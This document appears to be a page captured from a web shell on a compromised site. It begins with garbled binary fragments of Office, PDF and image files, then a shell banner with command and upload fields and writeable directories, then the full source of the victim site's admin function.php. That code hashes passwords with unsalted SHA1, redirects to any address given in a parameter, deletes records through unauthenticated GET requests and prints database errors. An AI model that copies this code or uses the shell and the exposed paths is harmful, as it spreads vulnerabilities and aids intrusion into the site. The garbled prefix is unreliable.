œ_#ÁÕ§TE NAŒ“KeÉ:”(åŽÖJÞùY’‚ñùž7; «]Û ý`8g“¯B© jd ÖÖ¸ðzÂœ¸¦4Ç3Kó^(ÍÖ¼ Õ€pvìwšõB4d f$Èü^0˜…åÌC$#2FŽÑ§±¦ÛZ/÷š&m£ñzÒÖ ’.Î]!Î;ƒ(Õ–¢d/—#Kª+tZyuÏB>NÛÖ†(¸ŒSà'³„Y˜´-_•¦¼´˜OlNK§¶ÒàŠˆTHµƒeTPå·fïM’…þuÏÍüp6دªE£åü‡ZØ'CKF#â«;‹eyO Qp„†l"ö1èíÙP ÏŒúl! BÝ2ñª•_VÁÉ÷3eu`–F¸ìI--ö<¿žë¯4õ캿¢)34Å{wMÉ2ÆÖFŸ¥` e9Ú¶¸P‡.”FÔï rY ‚²ÈTB,{ÛœéJ}«àQ4¹0Rû4D‚B§S‘ dO•v¾„™Sן¯3FeŸ™«+ÓâwH dÕÛÌì·P4ë&¥#rÜÉ Ù¦ê†ý·xòqk¯2,¹§™E\­ék‚×SᔏںÙ⺷ö£6…à ʾ qSá³Å|;àû}4Ÿ($â¹VY~óÍ!èÜÒŒËX½Ù1j‚VíÍŸš³+œ]«½g{_{/vµ½\¢¶vÉWKÿ:ñám½ ¥ S²x‘t ŽšÝÙÿÀÇ^ný PK   IW™k‚½÷ á  _rels/.relsUT dìd dìd dìd­’ÏNÃ0 ‡ï{ŠÈ÷ÕÝ@¡¥» ¤Ý*`%îÑ&QâÁöö‚J£ì°cœŸ¿|¶²ÙÆA½rL½wVE Šñ¶w­†çúay * 9Kƒw¬áÈ ¶ÕbóÄIîI]’Ê—4t"á1™ŽGJ…ìòMããH’±Å@æ…ZÆuYÞ`üÍ€jÂT;«!îì T} |Û7MoøÞ›ýÈNN<|v–í2ÄÜ¥ÏèšbË¢Ázó˜Ë )„"£O­Ï7ú{ZYÈ’yÞç#1'tuÉM?6o>Z´_å9›ëKÚ˜}?þ³žÏÌ·N>fµx PK    IWª½e  ¢ U  € word/document.xmlUT dìdPK    IWþË3” z  €J¢ word/settings.xmlUT dìdPK    IWC‡{š' ƒ  €¤ docProps/custom.xmlUT dìdPK    IW츱=Œ   €‡¥ [Content_Types].xmlUT dìdPK    IWV%ë±"   €U§ docProps/app.xmlUT dìdPK    IW€RŒ 3  €¶¨ docProps/core.xmlUT dìdPK    IWkòDn ô  €ª word/_rels/document.xml.relsUT dìdPK    IW ;$î   €Î« word/fontTable.xmlUT dìdPK    IW+åäz] ÷.  €ý¬ word/numbering.xmlUT dìdPK    IW¤2×r- ¿  €›° word/styles.xmlUT dìdPK    IWMFÒ ø  €´ word/header1.xmlUT dìdPK    IWF— T e  €· word/media/image1.jpegUT dìdPK    IW!Yéáå   €°Ë word/media/image2.pngUT dìdPK    IW°Àºë ú  €ÙÌ word/media/image3.pngUT dìdPK    IW$“†ª L  €Î word/footer1.xmlUT dìdPK    IWzaGôM   €ñÑ word/footer2.xmlUT dìdPK    IW–µ­âº P  €}Õ word/theme/theme1.xmlUT dìdPK    IW™k‚½÷ á €{Û _rels/.relsUT PK   ! bîh^   [Content_Types].xml ¢(   ¬”ËNÃ0E÷HüCä-Jܲ@5í‚Ç*Q>Àēƪc[žiiÿž‰ûB¡j7±ÏÜ{2ñÍh²nm¶‚ˆÆ»R ‹ÈÀU^7/ÅÇì%¿’rZYï @1__f› ˜q·ÃR4DáAJ¬h>€ãÚÇVßƹ ªZ¨9ÈÛÁàNVÞ8Ê©ÓãÑÔji){^óã-I‹"{Üv^¥P!XS)bR¹rú—K¾s(¸3Õ`cÞ0†½ÝÎß»¾7M4²©ŠôªZƐk+¿|\|z¿(Ž‹ôPúº6h_-[ž@!‚ÒØ Pk‹´­2nÏ}Ä?£LËð Ýû%áÄßdºždN"m,à¥ÇžDO97*‚~§Èɸ8ÀOíc|n¦Ñ äEøÿöéºóÀBÉÀ!$}‡íàÈé;{ìÐå[ƒîñ–é2þ ÿÿ PK   ! µU0#ô L _rels/.rels ¢(   ¬’MOÃ0 †ïHü‡È÷ÕݐBKwAH»!T~€Iܵ£$Ý¿'TƒG½~üÊÛÝ<êÈ!öâ4¬‹;#¶w­†—úqu *&r–Fq¬áÄvÕõÕö™GJy(v½*«¸¨¡KÉß#FÓñD±Ï.W ¥†=™ZÆMYÞbø®ÕBSí­†°·7 ê“Ï›×–¦é ?ˆ9LìÒ™ÈsbgÙ®|Èl!õùUSh9i°bžr:"y_dlÀóD›¿ý|-NœÈR"4ø2ÏGÇ% õZ´4ñ˝yÄ7 ëÈðÉ‚‹¨Þ ÿÿ PK   ! Q48wÛ —  xl/workbook.xml¤UÙnâ0}iþ!cñ‡ *–¢AšVU×$dC¬&vÆv UÕŸë@XÊK§/¹p|Žï¹N÷b“¥Ö •Š ÞC¸î"‹òHÄŒ¯zèá~b·‘¥4á1I§=ôJºèÿüÑ] ù¼âÙ ®z(Ñ:GE ͈ª‹œrˆ,…̈†©\9*—”Ä*¡Tg©ã¹nàd„q´Eåg0ÄrÉ":Q‘Q®· ’¦D}•°\UhYô¸ŒÈç"·#‘å ±`)Ó¯%(²²(œ®¸d‘‚ì nZ w v¡ñª• t¶TÆ")”Xê:@;[Ògú±ë`|²›ó=ø’ïHúÂL÷¬dðEVÁ+8€a÷Ûh¬Uz%„Íû"ZsÏÍCýî’¥ôqk]‹äù5ÉL¦Rd¥Dé˘i÷P ¦bM/|dÉ",…¨çãFNoçiûéë>aêiçsó#ðÄ ÕTr¢éHp ÜIú®ÝJìQ"ÀÜÖ-ý[0I¡¦ÀZ Z…d¡nˆN¬B¦=4 g %PDF-1.4 %âãÏÓ 3 0 obj << /Linearized 1 /L 422775 ÿØÿà JFIF    ÿÛ C      ÿÛ C   ÿÀ  X" ÿÄ    ÿÄ H   !1A"Qaq2‘¡#±ÁBRÑ3Cbrá$S‚¢²ð4ñ%6DTc’ÂsÿÄ   ÿÄ =  !1AQ"aq‘Á2R¡±BÑð#3br’²4á$‚¢ÂñÿÚ   ? áHBßÝ`„! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! ! stream

___________________________ < root@rinduuu:~# /home/rinduuuuuuu?! > ___________________________

Command :
ikan Uploader :
Directory :  /home/ni05r7l36tus/www/annapurnaed.com/admin/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //home/ni05r7l36tus/www/annapurnaed.com/admin/function.php
<?php
include "connection/config.php"; // Make sure $pdo and $uploadDir are defined
session_start();
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['login'])) {
    $username = trim($_POST['username']);
    $password = $_POST['password'];

    if (empty($username) || empty($password)) {
        die("Please enter both username and password.");
    }

    $stmt = $pdo->prepare("SELECT id, username, password FROM users WHERE username = :username LIMIT 1");
    $stmt->bindParam(':username', $username, PDO::PARAM_STR);
    $stmt->execute();

    $user = $stmt->fetch(PDO::FETCH_ASSOC);

    if ($user) {
        // Hash the input password with SHA1
        $inputHashedPassword = sha1($password);

        // Compare hashed passwords
        if ($inputHashedPassword === $user['password']) {
            // Password matches
            $_SESSION['user_id'] = $user['id'];
            $_SESSION['username'] = $user['username'];
            header("Location: index.php");
            exit;
        } else {
            echo "Invalid username or password.";
        }
    } else {
        echo "Invalid username or password.";
    }
} else {
    echo "Invalid request.";
}


    $uploadDir = __DIR__ . "/../upload/";
if (!file_exists($uploadDir)) {
    mkdir($uploadDir, 0777, true);
}
// ---------- ADD PROJECT ----------
if (isset($_POST['add_project'])) {
    $title         = htmlspecialchars($_POST['title'] ?? '');
    $pagetitle     = htmlspecialchars($_POST['page_title'] ?? '');
    $client        = htmlspecialchars($_POST['client'] ?? '');
    $company       = htmlspecialchars($_POST['company'] ?? '');
    $location      = htmlspecialchars($_POST['location'] ?? '');
    $projecttype   = htmlspecialchars($_POST['project_type'] ?? '');
    $allowed_tags = '<p><h1><h2><h3><h4><h5><h6><b><i><u><strong><em><ul><ol><li><br><span>';
    $description1 = strip_tags($_POST['description1'] ?? '', $allowed_tags);
    $description2  =strip_tags($_POST['description2'] ?? '', $allowed_tags);
    $description3  =strip_tags($_POST['description3'] ?? '', $allowed_tags);
    $description4  =strip_tags($_POST['description4'] ?? '', $allowed_tags);
    $slug          = htmlspecialchars($_POST['slug'] ?? '');
    $keyword       = htmlspecialchars($_POST['meta_keyword'] ?? '');
    $metatitle     = htmlspecialchars($_POST['meta_title'] ?? '');
    $seodescription= htmlspecialchars($_POST['meta_description'] ?? '');

    // Handle WebP uploads
    $images = [];
    foreach (['image', 'image1', 'image2'] as $fileKey) {
        if (!empty($_FILES[$fileKey]['name'])) {
            $imageTmp = $_FILES[$fileKey]['tmp_name'];
            $imageExt = strtolower(pathinfo($_FILES[$fileKey]['name'], PATHINFO_EXTENSION));
            $newName  = rand(10, 100) . time() . '.webp';
            $destPath = $uploadDir . $newName;

            // Convert to WebP
            switch ($imageExt) {
                case 'jpg':
                case 'jpeg':
                    $src = imagecreatefromjpeg($imageTmp);
                    break;
                case 'png':
                    $src = imagecreatefrompng($imageTmp);
                    imagepalettetotruecolor($src);
                    imagealphablending($src, true);
                    imagesavealpha($src, true);
                    break;
                case 'gif':
                    $src = imagecreatefromgif($imageTmp);
                    break;
                    case 'webp': // ✅ Support WebP input
                    $src = imagecreatefromwebp($imageTmp);
                    break;
                default:
                    $src = false;
            }

            if ($src !== false) {
                imagewebp($src, $destPath, 80);
                imagedestroy($src);
                $images[$fileKey] = $newName;
            } else {
                $images[$fileKey] = null;
            }
        } else {
            $images[$fileKey] = null;
        }
    }

    try {
        $stmt = $pdo->prepare("
            INSERT INTO `project`
            (`title`, `image`, `page_title`, `client`, `company`, `location`, `project_type`,
             `description1`, `description2`, `description3`, `description4`,
             `image1`, `image2`, `slug`, `keyword`, `metatitle`, `seodescription`)
            VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)
        ");

        $stmt->execute([
            $title,
            $images['image'],
            $pagetitle,
            $client,
            $company,
            $location,
            $projecttype,
            $description1,
            $description2,
            $description3,
            $description4,
            $images['image1'],
            $images['image2'],
            $slug,
            $keyword,
            $metatitle,
            $seodescription
        ]);

        header("Location: project.php");
        exit();
    } catch (PDOException $e) {
        echo "Database Error: " . $e->getMessage();
    }
}


// ---------- UPDATE PROJECT ----------
if (isset($_POST['update_project'])) {
    $id            = intval($_POST['id']);
    $title         = htmlspecialchars($_POST['title'] ?? '');
    $pagetitle     = htmlspecialchars($_POST['page_title'] ?? '');
    $client        = htmlspecialchars($_POST['client'] ?? '');
    $company       = htmlspecialchars($_POST['company'] ?? '');
    $location      = htmlspecialchars($_POST['location'] ?? '');
    $projecttype   = htmlspecialchars($_POST['project_type'] ?? '');
    $allowed_tags = '<p><h1><h2><h3><h4><h5><h6><b><i><u><strong><em><ul><ol><li><br><span>';
    $description1 = strip_tags($_POST['description1'] ?? '', $allowed_tags);
    $description2  =strip_tags($_POST['description2'] ?? '', $allowed_tags);
    $description3  =strip_tags($_POST['description3'] ?? '', $allowed_tags);
    $description4  =strip_tags($_POST['description4'] ?? '', $allowed_tags);

    $slug          = htmlspecialchars($_POST['slug'] ?? '');
    $metakeyword   = htmlspecialchars($_POST['meta_keyword'] ?? '');
    $metatitle     = htmlspecialchars($_POST['meta_title'] ?? '');
    $seodescription= htmlspecialchars($_POST['meta_description'] ?? '');

    // Folder for uploads
    $uploadDir = __DIR__ . "/../upload/";

    // Get old images from DB
    $stmt = $pdo->prepare("SELECT image, image1, image2 FROM project WHERE id = ?");
    $stmt->execute([$id]);
    $oldImages = $stmt->fetch(PDO::FETCH_ASSOC);

    $images = [];
    foreach (['image', 'image1', 'image2'] as $fileKey) {
        if (!empty($_FILES[$fileKey]['name'])) {
            $imageTmp = $_FILES[$fileKey]['tmp_name'];
            $imageExt = strtolower(pathinfo($_FILES[$fileKey]['name'], PATHINFO_EXTENSION));
            $newName  = rand(10, 100) . time() . '.webp'; // Always save as .webp
            $destPath = $uploadDir . $newName;

            // Convert image to WebP
            switch ($imageExt) {
                case 'jpg':
                case 'jpeg':
                    $src = imagecreatefromjpeg($imageTmp);
                    break;
                case 'png':
                    $src = imagecreatefrompng($imageTmp);
                    imagepalettetotruecolor($src);
                    imagealphablending($src, true);
                    imagesavealpha($src, true);
                    break;
                case 'gif':
                    $src = imagecreatefromgif($imageTmp);
                    break;
                    case 'webp': // ✅ Support WebP input
                    $src = imagecreatefromwebp($imageTmp);
                    break;
                default:
                    $src = false;
            }

            if ($src !== false) {
                if (imagewebp($src, $destPath, 80)) {
                    // ✅ Delete old file if exists
                    if (!empty($oldImages[$fileKey]) && file_exists($uploadDir . $oldImages[$fileKey])) {
                        unlink($uploadDir . $oldImages[$fileKey]);
                    }
                    $images[$fileKey] = $newName;
                } else {
                    $images[$fileKey] = $oldImages[$fileKey] ?? null;
                }
                imagedestroy($src);
            } else {
                $images[$fileKey] = $oldImages[$fileKey] ?? null;
            }
        } else {
            $images[$fileKey] = $oldImages[$fileKey] ?? null;
        }
    }

    try {
        $stmt = $pdo->prepare("UPDATE project SET 
            title=?, page_title=?, client=?, company=?, location=?, project_type=?, 
            description1=?, description2=?, description3=?, description4=?, 
            slug=?, keyword=?, metatitle=?, seodescription=?, 
            image=?, image1=?, image2=? 
            WHERE id=?");

        $stmt->execute([
            $title, $pagetitle, $client, $company, $location, $projecttype,
            $description1, $description2, $description3, $description4,
            $slug, $metakeyword, $metatitle, $seodescription,
            $images['image'], $images['image1'], $images['image2'],
            $id
        ]);

        header("Location: project.php?updated=1");
        exit;
    } catch (PDOException $e) {
        echo "Update Error: " . $e->getMessage();
    }
}

// ---------- DELETE PROJECT ----------

if (isset($_GET['slug'])) {
    $slug = $_GET['slug'];

    // 1. Get the project by slug
    $stmt = $pdo->prepare("SELECT id, image, image1, image2 FROM project WHERE slug = ?");
    $stmt->execute([$slug]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    if ($row) {
        // 2. Delete images if they exist
        foreach (['image', 'image1', 'image2'] as $imgKey) {
            $filePath = $uploadDir . $row[$imgKey];
            if (!empty($row[$imgKey]) && file_exists($filePath)) {
                unlink($filePath);
            }
        }

        // 3. Delete database record
        $stmt = $pdo->prepare("DELETE FROM project WHERE slug = ?");
        $stmt->execute([$slug]);

        // 4. Redirect
        $redirect = isset($_GET['redirect']) ? $_GET['redirect'] : 'project.php';
        header("Location: " . $redirect . "?deleted=1");
        exit;
    } else {
        echo "❌ No project found with slug: " . htmlspecialchars($slug);
    }
}


//--------add contact---------//
if (isset($_REQUEST['add_contact'])) {

    // Sanitize and validate inputs
    $name = isset($_REQUEST['name']) ? htmlspecialchars(trim($_REQUEST['name'])) : '';
    $email = isset($_REQUEST['email']) ? htmlspecialchars(trim($_REQUEST['email'])) : '';
    $phone = isset($_REQUEST['phone']) ? htmlspecialchars(trim($_REQUEST['phone'])) : '';
    $subject = isset($_REQUEST['subject']) ? htmlspecialchars(trim($_REQUEST['subject'])) : '';
    $message = isset($_REQUEST['message']) ? htmlspecialchars(trim($_REQUEST['message'])) : '';

    try {
        $stmt = $pdo->prepare("INSERT INTO `contact` (`name`, `email`, `phone`,`subject`, `message`) VALUES (:name, :email, :phone, :subject, :message)");
        $stmt->bindParam(':name', $name);
        $stmt->bindParam(':email', $email);
        $stmt->bindParam(':phone', $phone);
        $stmt->bindParam(':subject', $subject);
        $stmt->bindParam(':message', $message);
        
       if ($stmt->execute()) {
    echo "<script>
            alert('Submitted successfully');
            window.location.href = 'https://annapurnaed.com/contact.php';
          </script>";
    exit();
}


    } catch (PDOException $e) {
        echo "Error: " . $e->getMessage();
    }
}
if (isset($_GET['status']) && $_GET['status'] === 'success') {
    echo "<script>alert('Submitted successfully');</script>";
}



// ------------- DELETE Contact ---------------
if (isset($_GET['action']) && $_GET['action'] === 'delete_contact') {
    $id = intval($_GET['id']); // sanitize

    try {
        $stmt = $pdo->prepare("DELETE FROM `contact` WHERE `id` = ?");
        $stmt->execute([$id]);

        // Redirect back to the given page
        $redirect = isset($_GET['redirect']) ? $_GET['redirect'] : 'contact.php';
        header("Location: " . $redirect);
        exit();
    } catch (PDOException $e) {
        echo "Error deleting contact: " . $e->getMessage();
    }
}

if (isset($_POST['website_update_data'])) {
    $id = intval($_POST['id'] ?? 0);
    if ($id <= 0) {
        die("Invalid ID");
    }

    // Sanitize inputs
    $site_title       = htmlspecialchars(trim($_POST['site_title'] ?? ''));
    $email1           = htmlspecialchars(trim($_POST['email1'] ?? ''));
    $email2           = htmlspecialchars(trim($_POST['email2'] ?? ''));
    $address1         = htmlspecialchars(trim($_POST['address1'] ?? ''));
    $address2         = htmlspecialchars(trim($_POST['address2'] ?? ''));
    $address3         = htmlspecialchars(trim($_POST['address3'] ?? ''));
    $phone1           = htmlspecialchars(trim($_POST['phone1'] ?? ''));
    $phone2           = htmlspecialchars(trim($_POST['phone2'] ?? ''));
    $facebook         = htmlspecialchars(trim($_POST['facebook'] ?? ''));
    $twitter          = htmlspecialchars(trim($_POST['twitter'] ?? ''));
    $linkedin         = htmlspecialchars(trim($_POST['linkedin'] ?? ''));
    $meta_title       = htmlspecialchars(trim($_POST['meta_title'] ?? ''));
    $meta_description = htmlspecialchars(trim($_POST['meta_description'] ?? ''));
    $meta_keywords    = htmlspecialchars(trim($_POST['meta_keywords'] ?? ''));

    // Folder for uploads
    $uploadDir = __DIR__ . "/../upload/";
    if (!is_dir($uploadDir)) {
        mkdir($uploadDir, 0755, true);
    }

    // Get old image from DB (assuming image is stored in site_setting)
    $stmt = $pdo->prepare("SELECT logo FROM site_setting WHERE id = ?");
    $stmt->execute([$id]);
    $oldImage = $stmt->fetchColumn();

    $newImageName = $oldImage; // default if no new image uploaded

    if (!empty($_FILES['logo']['name']) && $_FILES['logo']['error'] === UPLOAD_ERR_OK) {
        $imageTmp = $_FILES['logo']['tmp_name'];
        $imageExt = strtolower(pathinfo($_FILES['logo']['name'], PATHINFO_EXTENSION));
        $newName  = rand(10, 100) . time() . '.webp'; // save as .webp
        $destPath = $uploadDir . $newName;

        // Convert image to WebP
        switch ($imageExt) {
            case 'jpg':
            case 'jpeg':
                $src = imagecreatefromjpeg($imageTmp);
                break;
            case 'png':
                $src = imagecreatefrompng($imageTmp);
                imagepalettetotruecolor($src);
                imagealphablending($src, true);
                imagesavealpha($src, true);
                break;
            case 'gif':
                $src = imagecreatefromgif($imageTmp);
                break;
            case 'webp':
                $src = imagecreatefromwebp($imageTmp);
                break;
            default:
                $src = false;
        }

        if ($src !== false) {
            if (imagewebp($src, $destPath, 80)) {
                // Delete old image if exists
                if (!empty($oldImage) && file_exists($uploadDir . $oldImage)) {
                    unlink($uploadDir . $oldImage);
                }
                $newImageName = $newName;
            }
            imagedestroy($src);
        }
    }

    // Prepare UPDATE statement including image field
    $stmt = $pdo->prepare("UPDATE site_setting SET
            site_title = :site_title,
            email1 = :email1,
            email2 = :email2,
            address1 = :address1,
            address2 = :address2,
            address3 = :address3,
            phone1 = :phone1,
            phone2 = :phone2,
            facebook = :facebook,
            twitter = :twitter,
            linkedin = :linkedin,
            meta_title = :meta_title,
            meta_description = :meta_description,
            meta_keywords = :meta_keywords,
            logo = :logo
            WHERE id = :id
        ");

    $stmt->execute([
        ':site_title'       => $site_title,
        ':email1'           => $email1,
        ':email2'           => $email2,
        ':address1'         => $address1,
        ':address2'         => $address2,
        ':address3'         => $address3,
        ':phone1'           => $phone1,
        ':phone2'           => $phone2,
        ':facebook'         => $facebook,
        ':twitter'          => $twitter,
        ':linkedin'         => $linkedin,
        ':meta_title'       => $meta_title,
        ':meta_description' => $meta_description,
        ':meta_keywords'    => $meta_keywords,
        ':logo'            => $newImageName,
        ':id'               => $id,
    ]);

    if ($stmt->errorCode() !== '00000') {
        $err = $stmt->errorInfo();
        die("SQL error: " . $err[2]);
    }

    header("Location: site_setting.php");
    exit;
}

// ---------- ADD CAREER ----------
if (isset($_POST['add_career'])) {
    $position       = htmlspecialchars($_POST['position'] ?? '');
    $short_desc     = htmlspecialchars($_POST['short_description'] ?? '');
    $role_overview  = strip_tags($_POST['role_overview'] ?? '', '<p><h1><h2><h3><h4><h5><h6><b><i><u><strong><em><ul><ol><li><br><span>');
    $responsibility = strip_tags($_POST['responsibility'] ?? '', '<p><h1><h2><h3><h4><h5><h6><b><i><u><strong><em><ul><ol><li><br><span>');
    $salary         = htmlspecialchars($_POST['salary'] ?? '');
    $location       = htmlspecialchars($_POST['location'] ?? '');
    $job_type       = htmlspecialchars($_POST['job_type'] ?? '');
    $experience     = htmlspecialchars($_POST['experience'] ?? '');
    $vacancy        = (int)($_POST['vacancy'] ?? 0);

    $slug           = htmlspecialchars($_POST['slug'] ?? '');
    $keyword        = htmlspecialchars($_POST['meta_keyword'] ?? '');
    $metatitle      = htmlspecialchars($_POST['meta_title'] ?? '');
    $seodescription = htmlspecialchars($_POST['meta_description'] ?? '');

    // Image Upload (optional)
    $image = null;
    if (!empty($_FILES['image']['name'])) {
        $imageTmp = $_FILES['image']['tmp_name'];
        $imageExt = strtolower(pathinfo($_FILES['image']['name'], PATHINFO_EXTENSION));
        $newName  = rand(10, 100) . time() . '.webp';
        $destPath = $uploadDir . $newName;

        switch ($imageExt) {
            case 'jpg':
            case 'jpeg':
                $src = imagecreatefromjpeg($imageTmp);
                break;
            case 'png':
                $src = imagecreatefrompng($imageTmp);
                imagepalettetotruecolor($src);
                imagealphablending($src, true);
                imagesavealpha($src, true);
                break;
            case 'gif':
                $src = imagecreatefromgif($imageTmp);
                break;
            case 'webp':
                $src = imagecreatefromwebp($imageTmp);
                break;
            default:
                $src = false;
        }

        if ($src !== false) {
            imagewebp($src, $destPath, 80);
            imagedestroy($src);
            $image = $newName;
        }
    }

    try {
        $stmt = $pdo->prepare("
            INSERT INTO `careers`
            (`position`, `short_description`, `role_overview`, `responsibility`, `salary`, `location`, `job_type`, `experience`, `vacancy`,
             `image`, `slug`, `keyword`, `metatitle`, `seodescription`)
            VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)
        ");

        $stmt->execute([
            $position,
            $short_desc,
            $role_overview,
            $responsibility,
            $salary,
            $location,
            $job_type,
            $experience,
            $vacancy,
            $image,
            $slug,
            $keyword,
            $metatitle,
            $seodescription
        ]);

        header("Location: careers.php");
        exit();
    } catch (PDOException $e) {
        echo "Database Error: " . $e->getMessage();
    }
}

// ---------- UPDATE CAREER ----------
if (isset($_POST['update_career'])) {
    $id             = (int)($_POST['id'] ?? 0);
    $position       = htmlspecialchars($_POST['position'] ?? '');
    $short_desc     = htmlspecialchars($_POST['short_description'] ?? '');
    $role_overview  = strip_tags($_POST['role_overview'] ?? '', '<p><h1><h2><h3><h4><h5><h6><b><i><u><strong><em><ul><ol><li><br><span>');
    $responsibility = strip_tags($_POST['responsibility'] ?? '', '<p><h1><h2><h3><h4><h5><h6><b><i><u><strong><em><ul><ol><li><br><span>');
    $salary         = htmlspecialchars($_POST['salary'] ?? '');
    $location       = htmlspecialchars($_POST['location'] ?? '');
    $job_type       = htmlspecialchars($_POST['job_type'] ?? '');
    $experience     = htmlspecialchars($_POST['experience'] ?? '');
    $vacancy        = (int)($_POST['vacancy'] ?? 0);

    $slug           = htmlspecialchars($_POST['slug'] ?? '');
    $keyword        = htmlspecialchars($_POST['meta_keyword'] ?? '');
    $metatitle      = htmlspecialchars($_POST['meta_title'] ?? '');
    $seodescription = htmlspecialchars($_POST['meta_description'] ?? '');

    // Keep old image unless a new one is uploaded
    $stmtOld = $pdo->prepare("SELECT image FROM careers WHERE id = ?");
    $stmtOld->execute([$id]);
    $oldImage = $stmtOld->fetchColumn();
    $image = $oldImage;

    if (!empty($_FILES['image']['name'])) {
        $imageTmp = $_FILES['image']['tmp_name'];
        $imageExt = strtolower(pathinfo($_FILES['image']['name'], PATHINFO_EXTENSION));
        $newName  = rand(10, 100) . time() . '.webp';
        $destPath = $uploadDir . $newName;

        switch ($imageExt) {
            case 'jpg':
            case 'jpeg':
                $src = imagecreatefromjpeg($imageTmp);
                break;
            case 'png':
                $src = imagecreatefrompng($imageTmp);
                imagepalettetotruecolor($src);
                imagealphablending($src, true);
                imagesavealpha($src, true);
                break;
            case 'gif':
                $src = imagecreatefromgif($imageTmp);
                break;
            case 'webp':
                $src = imagecreatefromwebp($imageTmp);
                break;
            default:
                $src = false;
        }

        if ($src !== false) {
            imagewebp($src, $destPath, 80);
            imagedestroy($src);
            $image = $newName;
        }
    }

    try {
        $stmt = $pdo->prepare("
            UPDATE `careers`
            SET `position`=?, `short_description`=?, `role_overview`=?, `responsibility`=?, `salary`=?, 
                `location`=?, `job_type`=?, `experience`=?, `vacancy`=?, `image`=?, `slug`=?, 
                `keyword`=?, `metatitle`=?, `seodescription`=?
            WHERE id=?
        ");

        $stmt->execute([
            $position,
            $short_desc,
            $role_overview,
            $responsibility,
            $salary,
            $location,
            $job_type,
            $experience,
            $vacancy,
            $image,
            $slug,
            $keyword,
            $metatitle,
            $seodescription,
            $id
        ]);

        header("Location: careers.php");
        exit();
    } catch (PDOException $e) {
        echo "Database Error: " . $e->getMessage();
    }
}


// ---------- DELETE CAREER ----------
if (isset($_GET['delete_career'])) {
    $id = (int)$_GET['delete_career'];

    // Optional: Delete associated image
    $stmtImg = $pdo->prepare("SELECT image FROM careers WHERE id=?");
    $stmtImg->execute([$id]);
    $imagePath = $stmtImg->fetchColumn();
    if ($imagePath && file_exists($uploadDir . $imagePath)) {
        unlink($uploadDir . $imagePath);
    }

    try {
        $stmt = $pdo->prepare("DELETE FROM careers WHERE id=?");
        $stmt->execute([$id]);
        header("Location: careers.php");
        exit();
    } catch (PDOException $e) {
        echo "Database Error: " . $e->getMessage();
    }
}

// -------- ADD Job Application -------- //
if (isset($_REQUEST['apply_job'])) {

    // Sanitize and validate inputs
    $name    = isset($_REQUEST['name']) ? htmlspecialchars(trim($_REQUEST['name'])) : '';
    $email   = isset($_REQUEST['email']) ? htmlspecialchars(trim($_REQUEST['email'])) : '';
    $phone   = isset($_REQUEST['phone']) ? htmlspecialchars(trim($_REQUEST['phone'])) : '';
    $position = isset($_REQUEST['position']) ? htmlspecialchars(trim($_REQUEST['position'])) : '';
    $message = isset($_REQUEST['message']) ? htmlspecialchars(trim($_REQUEST['message'])) : '';

    // Handle resume upload (optional)
    $resume = null;
    if (!empty($_FILES['resume']['name'])) {
        $allowed_ext = ['pdf', 'doc', 'docx'];
        $ext = strtolower(pathinfo($_FILES['resume']['name'], PATHINFO_EXTENSION));

        if (in_array($ext, $allowed_ext)) {
            $newName = time() . '_' . preg_replace("/[^a-zA-Z0-9.]/", "_", $_FILES['resume']['name']);
            $uploadPath = "/../upload/" . $newName;

            if (move_uploaded_file($_FILES['resume']['tmp_name'], $uploadPath)) {
                $resume = $newName;
            }
        }
    }

    try {
        $stmt = $pdo->prepare("
            INSERT INTO `job_applications` (`name`, `email`, `phone`, `position`, `message`, `resume`) 
            VALUES (:name, :email, :phone, :position, :message, :resume)
        ");
        $stmt->bindParam(':name', $name);
        $stmt->bindParam(':email', $email);
        $stmt->bindParam(':phone', $phone);
        $stmt->bindParam(':position', $position);
        $stmt->bindParam(':message', $message);
        $stmt->bindParam(':resume', $resume);

        if ($stmt->execute()) {
            echo "<script>
                    alert('Application submitted successfully');
                    window.location.href = 'job_applly_form.php';
                  </script>";
            exit();
        }
    } catch (PDOException $e) {
        echo "Error: " . $e->getMessage();
    }
}

// ------------- DELETE Job Application --------------- //
if (isset($_GET['action']) && $_GET['action'] === 'delete_apply') {
    $id = intval($_GET['id']); // sanitize

    try {
        $stmt = $pdo->prepare("DELETE FROM `job_applications` WHERE `id` = ?");
        $stmt->execute([$id]);

        $redirect = isset($_GET['redirect']) ? $_GET['redirect'] : 'job_applly_form.php';
        header("Location: " . $redirect);
        exit();
    } catch (PDOException $e) {
        echo "Error deleting application: " . $e->getMessage();
    }
}


?>

........